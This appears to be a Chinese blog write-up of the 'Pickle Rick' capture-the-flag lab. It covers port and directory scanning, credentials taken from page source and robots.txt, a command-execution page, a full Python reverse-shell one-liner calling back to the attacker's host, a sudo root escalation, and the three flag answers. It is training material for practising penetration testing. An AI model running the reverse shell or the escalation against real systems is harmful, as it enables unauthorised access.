Pickle Rick

1.What is the first ingredient that Rick needs?

2.What is the second ingredient in Rick’s potion?

3.What is the last and final ingredient?


What is the first ingredient that Rick needs?

首先登录到指定的ip地址,看到如下页面。
在这里插入图片描述


用nmap扫描目标namp -sC -sV x.x.x.x,在此期间我们鼠标右键查看源代码,注意到注释好像给了一个登录账号的用户名——R1ckRul3s

在这里插入图片描述


用Gobuster进行目录扫描,我们可以扫描到一个登录界面——/login.php

gobuster dir -u http://X.X.X.X -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,js,css,py

在这里插入图片描述


进入login.php页面,目前我们已经得知了登录的用户名,我们可以在robots.txt页面找到登录密码——Wubbalubbadubdub
在这里插入图片描述

登录成功后我们进入了一个拥有命令行执行功能的页面,我们可以使用“ls”命令列出当前路径下的文件,看到第一个文件有点可疑,我们通过输入“less 文件名”命令来读取其中的内容,得到第一个问题的答案——mr. meeseek hair。(这里不使用cat命令进行读取是因为cat命令被过滤了,详细可以执行grep -R .来查看具体的信息)。

在这里插入图片描述


What is the second ingredient in Rick’s potion?

既然可以这个页面可以执行我们输入的指令,我们就可以尝试去获取shell,前面我们通过nmap扫描结果看到目标开启了ssh服务,这里我们通过输入一段命令 `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`,让目前机器执行一段反向shell脚本代码,与此同时我们在本地监听对应的1234端口(可以自定义)`nc -lvnp 1234`。

在这里插入图片描述


当我们获得shell之后,输入命令python3 -c 'import pty;pty.spawn("/bin/bash")',再次输入命令sudo bash即可获得root权限。

在这里插入图片描述


此时我们cd /home来到home路径下使用ls查看用户,看到rick,我们cd rick进入rick,通过ls看到这里是第二个成分,cat *直接读取,得到第二个成分——jerry tear
在这里插入图片描述


What is the last and final ingredient?

接着刚才的操作,现在我们回到/root路径下,查看那里是否有我们想要的第三个成分,`cd /root`切换到root路径下,`ls`查看,看到了有趣的文件3rd.txt,直接`cat 3rd.txt`打开,得到第三个成分——`fleeb juice`。

在这里插入图片描述



  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值